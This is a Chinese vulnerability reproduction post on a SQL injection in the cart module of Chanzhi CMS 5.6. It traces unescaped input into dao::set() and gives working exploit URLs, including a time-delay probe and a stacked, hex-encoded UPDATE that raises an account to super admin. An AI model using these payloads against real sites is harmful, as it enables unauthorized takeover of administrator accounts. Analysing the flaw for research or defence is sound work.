[复现]蝉知cms 5.6 前台注入
https://share.weiyun.com/5cbff06337d32a9748d0f1bead5ddbd5
前台注入
在/chanzhieps/system/module/cart/control.php页面的add函数
public function add($product, $count){if($this->app->user->account == 'guest'){/* Save info to cookie if user is guest. */$this->cart->addInCookie($product, $count);$this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess)); }else{$result = $this->cart->add($product, $count);if($result) $this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));$this->send(array('result' => 'fail', 'message' => dao::getError()));} }
public function add($product, $count)
$count是用户输入
我们看会员登录以后的,也就是
$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php
public function add($productID, $count){$hasProduct = $this->dao->select('count(id) as count')->from(TABLE_CART)->where('account')->eq($this->app->user->account)->andWhere('product')->eq($productID)->fetch('count');if(!$hasProduct){$product = new stdclass();$product->product = $productID;$product->account = $this->app->user->account;$product->count = $count;$this->dao->insert(TABLE_CART)->data($product)->exec();}else{$this->dao->update(TABLE_CART)->set("count= count + {$count}")->where('account')->eq($this->app->user->account)->andWhere('product')->eq($productID)->exec();}return !dao::isError(); }
如果能查到产品的话,更新数量set("count= count + {$count}")
继续跟进set函数
/chanzhieps/system/lib/base/dao/dao.class.php
public function set($set){/* Add ` to avoid keywords of mysql. */if(strpos($set, '=') ===false){$set = str_replace(',', '', $set);$set = '`' . str_replace('`', '', $set) . '`';}$this->sql .= $this->isFirstSet ? " $set" : ", $set";if($this->isFirstSet) $this->isFirstSet = false;return $this; }
可以看到直接进入了$this->sql
测试一下
http://localhost/www/index.php/cart-add-1-(select%20sleep(10))
成功进行延时操作
这个cms用的是pdo的方式连接mysql。也就是说可以多语句执行
http://localhost/www/index.php/cart-add-1-1;set%20@b=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b;prepare%20x%20from%20@b;execute%20x;select%201%20union%20select%201
update一下 将低权限账户提升至super
转载于:https://www.cnblogs.com/test404/p/7348241.html
[复现]蝉知cms 5.6 前台注入相关推荐
- 蝉知CMS的GetShell
前言 简单记一下在前段时间的 GKCTF X DASCTF 应急挑战杯中遇到的这个有趣的 CMS,题目不难,但是还蛮有趣的. 预期解 进入题目,是一个蝉知 CMS: 访问 admin.php 见到后台 ...
- 蝉知 路径index.php,宝塔面板下蝉知cms nginx环境下完美伪静态的解决办法
在使用蝉知cms中遇到nginx环境下伪静态无效的问题 官网说明: http://www.chanzhi.org/cms/161.html http://www.chanzhi.org/thread/ ...
- 蝉知 路径index.php,蝉知CMS系统部署中的一些问题的解决方法
本人所带的网页设计课,要求学生最后用CMS系统部署一个公网可以访问的网站.其中推荐了蝉知CMS系统,因为我想这个系统比较简单,全中文文档,学生好上手.不过在实际开发中,学生还有一些问题,是官方手册中较 ...
- 蝉知CMS 7.X XSS漏洞复现
个人博客地址:xzajyjs.cn 作为一个开源的企业门户系统(EPS), 企业可以非常方便地搭建一个专业的企业营销网站,进行宣传,开展业务,服务客户.蝉知系统内置了文章.产品.论坛.评论.会员.博客 ...
- 蝉知 index.php,蝉知CMS建站系统如何设置伪静态
蝉知 系统支持两种访问方式,一种是传统的get方式,比如/?m=article&id=123,代表文章模块的123这篇文章.还有一种是静态url访问,比如/article-view-123.h ...
- 蝉知CMS本地迁移到服务器具体步骤
蝉知迁移步骤(2个方案,二选一即可) 方案一(整个chanzhi(eps)目录拷贝,假设新安装的蝉知文件夹名称为chanzhieps): 1.在新服务器上安装相同版本(版本号必须一致)的蝉知(安装文档 ...
- 蝉知企业门户系统v7.7 - 命令执行漏洞
蝉知企业门户系统v7.7 - 命令执行漏洞 环境搭建 漏洞复现 漏洞分析 环境搭建 源码下载地址 解压后将文件放在 web 目录下即可访问 漏洞复现 首先登录后台,找到模板编辑的地方(设计 -> ...
- 礼赞 Wordpress,蝉知可直接使用 Wordpress 模板
说起内容管理系统,Wordpress当属全球老大.据统计全球有将近1/4的网站是使用wordpress搭建的.Wordpress之所以这样流行,除了它起步的时间较早之外,丰富的模板.插件也启动了非常重 ...
- php 5.6.15漏洞,中国骇客云0day漏洞之蝉知 5.6 getshell
前台注入 在/chanzhieps/system/module/cart/control.php页面的add函数 更多关注www.hackerschina.org PHP 1 2 3 4 5 6 7 ...
最新文章
- 市场分享竞品分析-Android
- java 检查目录是否存在_如何检查Java目录是否存在?
- 逆波兰式数学表达式求解
- 面试收集—hello,world 也有新花样
- Java面向对象之继承、super关键字、方法重写
- lsb算法 java,解决:-bash: lsb_release: command not found办法
- iOS------自动查找项目中不用的图片资源
- ios 点击出现另外一套tabbar_iOS 点击UITabBar触发刷新
- 树莓派3B的摄像头模块
- webSSH如何安装?如何使用?解决Web端远程连接终端~~运维篇
- ubuntu20.04.1下安装qt4相关依赖库
- 【USACO题库】3.2.4 Feed Ratios饲料调配
- 家庭教育之学生不愿做家务怎么办?
- 高考英语真题网络计算机话题,2019高考英语十大热门话题
- 免费将XPS转成Word的方法
- linux网卡驱动离线安装_解决安装Linux之后没有网卡驱动
- 如何把在一些管家软件下载的谷歌卸载干净(谷歌卸载不干净、安装不成功的原因,谷歌首页被360篡改)
- 研究OAR分割的意义、应用及目前相关方法和评价指标
- 微信零钱交易记录怎么彻底删除,这些方法等你来盘
- latex (加粗方法)